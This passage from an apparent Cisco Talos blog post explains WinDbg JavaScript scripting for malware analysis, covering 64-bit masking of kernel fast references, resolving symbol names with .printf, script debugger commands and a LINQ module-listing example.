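// _EX_CALLBACK_ROUTINE_BLOCK. The mask is applied to the low dword only.
const EX_FAST_REF_LOW_MASK = 0xfffffff0;

// Constructed sample: 8 little-endian bytes as readMemoryValues(addr, 1, 8) would
// fetch them, encoding the fast reference 0xffff8a0c1234567d
// (callback block at 0xffff8a0c12345670, reference count 0xd).
const SAMPLE_FAST_REF_BYTES = Uint8Array.from([0x7d, 0x56, 0x34, 0x12, 0x0c, 0x8a, 0xff, 0xff]);

class Int64 {
  constructor(low, high) {
    this.low = low >>> 0;    // force unsigned 32-bit halves
    this.high = high >>> 0;
  }
  static fromBigInt(v) {
    return new Int64(Number(v & 0xffffffffn), Number((v >> 32n) & 0xffffffffn));
  }
  getLowPart() { return this.low; }
  getHighPart() { return this.high; }
  toBigInt() { return (BigInt(this.high) << 32n) | BigInt(this.low); }
  toString(radix = 10) { return this.toBigInt().toString(radix); }
}

// Decode a qword from memory bytes without ever building a full-width Number.
function readInt64LE(bytes, offset = 0) {
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  return new Int64(view.getUint32(offset, true), view.getUint32(offset + 4, true));
}

// Does the value survive a round trip through a JavaScript Number? (false above 2^53)
function fitsInNumber(int64) {
  return Number.isSafeInteger(Number(int64.toBigInt()));
}

// The 64-bit mask literal itself is not representable: 0xfffffffffffffff0 rounds
// to 2^64 as a double, which is why a mask "wider than 53 bits" breaks.
function maskLiteralIsExact() {
  return BigInt(0xfffffffffffffff0) === 0xfffffffffffffff0n;
}

// Naive approach: treat the value as a Number and AND it. The Number is already
// rounded above 2^53 and & truncates both operands to 32 bits, so the high dword is lost.
function maskNaive(int64) {
  const asNumber = Number(int64.toBigInt());
  return BigInt((asNumber & EX_FAST_REF_LOW_MASK) >>> 0);
}

// Workaround from the post: mask the low and high dwords separately, then recombine.
function maskSplit(int64) {
  const low = (int64.getLowPart() & EX_FAST_REF_LOW_MASK) >>> 0;
  const high = int64.getHighPart();   // upper half of the mask is all ones: unchanged
  return new Int64(low, high);
}

// Full pipeline: raw bytes -> Int64 -> callback block address as a 0x-prefixed hex string
// (the form a .printf or dx command expects).
function callbackBlockAddress(bytes) {
  return "0x" + maskSplit(readInt64LE(bytes)).toString(16);
}

const sample = readInt64LE(SAMPLE_FAST_REF_BYTES);
console.log("fast ref :", "0x" + sample.toString(16), "fits in Number:", fitsInNumber(sample));
console.log("naive    :", "0x" + maskNaive(sample).toString(16));
console.log("split    :", callbackBlockAddress(SAMPLE_FAST_REF_BYTES));
console.log("64-bit mask literal exact:", maskLiteralIsExact());
```

The naive result is a 32-bit number with the high dword gone, while the split version yields the correct block address; the same split is what the ListProcessCreateCallbacks function above does with host.Int64.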

              Another interesting point is that the symbol name is resolved using the standard debugger command .printf. You can obtain the address of a symbol with the JavaScript function host.getModuleSymbolAddress, but at the time of writing there is no function that returns the symbol name for a given address. As a workaround, .printf is run through exec with the %Y format specifier, which returns a string containing the symbol name for the address. One caveat: pass the address as 0x-prefixed hex, because the MASM evaluator interprets an unprefixed number as hexadecimal by default, so a decimal string produced by toString() would be misread.

              Debugging scripts

              Developers who write scripts in any common language know that a set of debugging tools is needed for development to succeed. A debugger needs to set breakpoints and inspect variables and object values. The same is true for writing scripts that access various operating system structures or analyze malware samples. Here too, the WinDbg JavaScript extension provides the necessary functionality in the form of a script debugger with commands familiar to regular WinDbg users.

              Debugging starts by executing the .scriptdebug command, which loads the JavaScript debugger for a specific script. Once the script is loaded, you can choose the events on which the debugger should break and set breakpoints on specific lines of the script code.

              The sxe command in the JavaScript debugger defines the events on which the debugger breaks, just as in WinDbg. For example, to break on the first line of the script, enter sxe en. Once the command has completed, use the sx command to see the break status of all available events.

              sx displays the JavaScript debugger's break status for the various events

              You can also set a breakpoint on a specific script line with the bp command, using a syntax similar to standard WinDbg. The breakpoint is specified as a line number and a position within that line; if the position is 0, the debugger automatically places the breakpoint at the first possible position on that line.

              Setting a breakpoint at position 0 of a line places it at the first possible position on that line

              Now that all the necessary breakpoints are set, we exit the script debugger. Debugging resumes once the script is invoked, either by accessing the WinDbg variable @$scriptContents with dx and calling the function we want to debug, or by launching the script as usual with .scriptrun.

              Scripts can be launched for debugging through the @$scriptContents variable

              The script debugger includes its own JavaScript evaluation command, ?, which lets you evaluate JavaScript expressions and inspect the values of script variables and objects.

              Inspecting the result of a JavaScript expression with the ? command

              JavaScript debugging is a powerful tool that proper development requires. Its capabilities are already sufficient in the initial version of the JavaScript extension, and we hope they will become richer and more stable as WinDbg Preview approaches full release.

              Summary

              I hope this post has provided some pointers to useful features available through the official Microsoft JavaScript WinDbg extension for malware analysis. The API exposed through JavaScript is not complete, but there are ways to work around the limitations by wrapping standard WinDbg commands and parsing their output. This solution is not ideal, and we hope that new features will be added directly to the JavaScript provider to make it more scriptable.

              The Debugging Tools for Windows development team seems to be putting all their efforts into adding new JavaScript modules. Recently, file system interaction and code namespace modules were added, opening up new possibilities for code analysis. Interested readers can check out the CodeFlow JavaScript extension available from the official examples repository on Github.

              If you would like to learn a few more tips for malware analysis using WinDbg and JavaScript, Cisco Talos will be giving a session at the CARO workshop in Copenhagen in February.

              References

              dx command

              MASM and C++ WinDbg evaluators

              Linq and the debugger data model

              Reverser debugger data model

              Debugging JavaScript with WinDbg

              JavaScript debugger sample scripts

              WinDbg JavaScript script video

              DX command video

              Debugger object model video

              
              

              The LINQ example referred to in the "LINQ in JavaScript" section above:

              function ListProcessModules()
              {
                  // An example of how to use LINQ queries in JavaScript.
                  // Instead of a lambda expression, Where takes a function returning a boolean,
                  // and Select takes a function returning a new object built from selected members
                  // of the object being looked at (in this case a Module).
                  let mods = host.currentProcess.Modules
                      .Where(function (k) { return k.Name.includes("dll"); })
                      .Select(function (k) { return { name: k.Name, addr: k.BaseAddress }; });
                  for (var lk of mods) {
                      logme(lk.name + " at " + lk.addr.toString(16));
                  }
              }
